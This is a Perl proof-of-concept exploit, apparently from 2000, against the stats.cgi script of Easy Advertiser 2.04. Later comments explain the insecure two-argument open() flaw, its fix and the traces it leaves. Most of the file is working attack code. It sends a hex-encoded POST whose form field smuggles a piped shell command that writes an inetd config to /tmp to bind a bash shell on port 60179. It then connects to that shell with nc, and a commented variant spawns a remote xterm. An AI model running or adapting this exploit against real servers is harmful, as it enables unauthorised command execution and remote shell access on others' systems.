#!/usr/bin/perl -w

## Easy Advertiser v. 2.04 / (c) 1999 Smokey 
## Communications, LLC - PoC exploit.
## http://www.smokey.net/
##
## Exploits an insecure open() in the stats.cgi
## script. The exploit will attempt to bind a 
## shell with nobody/99 privileges on port 60179
## This will not work if the $target does not 
## have inetd installed. I have included the code
## to simply spawn an xterm as well.
##
## [ Wed Oct  4 16:53:05 CEST 2000 ]
##
## http://teleh0r.cjb.net/ || teleh0r@doglover.com

use strict; use Socket;

# The only input is the target host on the command line; it is used as-is,
# never checked against a hostname/IP pattern.
if (@ARGV < 1) {
    print("Usage: $0 <target>\n");
    exit(1);
}

# $length is declared here but never assigned or read anywhere below.
my($target, $length, $cgicode, $agent, 
   $sploit, $iaddr, $paddr, $proto);

$target = $ARGV[0];

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/stats.cgi\n");

# A browser-looking User-Agent so the request blends into ordinary access
# logs; the POST to /cgi-bin/stats.cgi itself is still what a log review
# would key on.
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

$cgicode =

# echo 'fido stream tcp nowait nobody /bin/bash bash -i' > /tmp/.hass;
# /usr/sbin/inetd /tmp/.hass

# Vulnerability class (per the header): a form field reaches a two-argument
# open() on the server. In that form a value wrapped in '|' characters is
# taken as a pipe mode, so the field's text is executed by the shell instead
# of being opened as a file. The server-side fix is three-argument open()
# with an explicit mode, plus validating the field against an anchored
# allow-list before it is used at all.
#
# Defender's view: the artifacts this leaves are an inetd instance started
# with a config file under /tmp and a new TCP listener on 60179 on the host,
# and at the web tier a POST to /cgi-bin/stats.cgi whose body contains raw
# pipe characters. The form body below is hex-escaped for transport; its
# plain-text equivalent is the two-line comment above.

# stats.cgi port binding cgicode (port fido/60179)
"\x73\x74\x61\x74\x73\x3d\x73\x74\x61\x74\x73\x26\x6e".
"\x61\x6d\x65\x3d\x74\x65\x6c\x65\x68\x30\x72\x26\x61".
"\x64\x73\x6e\x3d\x7c\x65\x63\x68\x6f\x2b\x27\x66\x69".
"\x64\x6f\x2b\x73\x74\x72\x65\x61\x6d\x2b\x74\x63\x70".
"\x2b\x6e\x6f\x77\x61\x69\x74\x2b\x6e\x6f\x62\x6f\x64".
"\x79\x2b\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x2b\x62".
"\x61\x73\x68\x2b\x2d\x69\x27\x2b\x3e\x2b\x2f\x74\x6d".
"\x70\x2f\x2e\x68\x61\x73\x73\x3b\x2f\x75\x73\x72\x2f".
"\x73\x62\x69\x6e\x2f\x69\x6e\x65\x74\x64\x2b\x2f\x74".
"\x6d\x70\x2f\x2e\x68\x61\x73\x73\x7c\x26\x6c\x6f\x67".
"\x69\x6e\x3d\x4c\x6f\x67\x69\x6e";

# To spawn an xterm instead:
# "stats=stats&name=teleh0r&adsn=%7Cxterm+-ut+-display+".
# "target.com "%3A0%7C&login=Login";

# Hand-built HTTP/1.0 request. The string literal below spans several
# lines with embedded newlines, so nothing may be inserted inside it;
# Host: and User-Agent: are interpolated from the variables above.
$sploit =
"POST /cgi-bin/stats.cgi HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: 168

$cgicode";

# Plain blocking TCP client to port 80 on a bareword filehandle. No timeout
# is set, so connect() to an unreachable host blocks for the OS default.
# Each step uses || die, which is fine here because every call is fully
# parenthesised before the operator.
$iaddr = inet_aton($target)                     || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr)                || die("Error: $!\n");
$proto = getprotobyname('tcp')                  || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto)    || die("Error: $!\n");
connect(SOCKET, $paddr)                         || die("Error: $!\n");
# Single send() of the whole request plus a trailing CRLF; send returns the
# byte count (undef on error), so || die only fires on failure. The response
# is never read.
send(SOCKET,"$sploit\015\012", 0)               || die("Error: $!\n");
close(SOCKET);

# Fixed 5-second wait, then hand off to nc. $target comes straight from @ARGV
# and is interpolated into a shell command line — a shell-injection footgun
# in the script itself; list-form system('nc', '-w', '10', $target, '60179')
# would bypass the shell. Also assumes an nc binary is on PATH.
print("\nSleeping 5 seconds - waiting for the shell ...\n\n");
sleep(5); system("nc -w 10 $target 60179"); exit(0);
#                   www.hack.co.za     [12 October 2000]#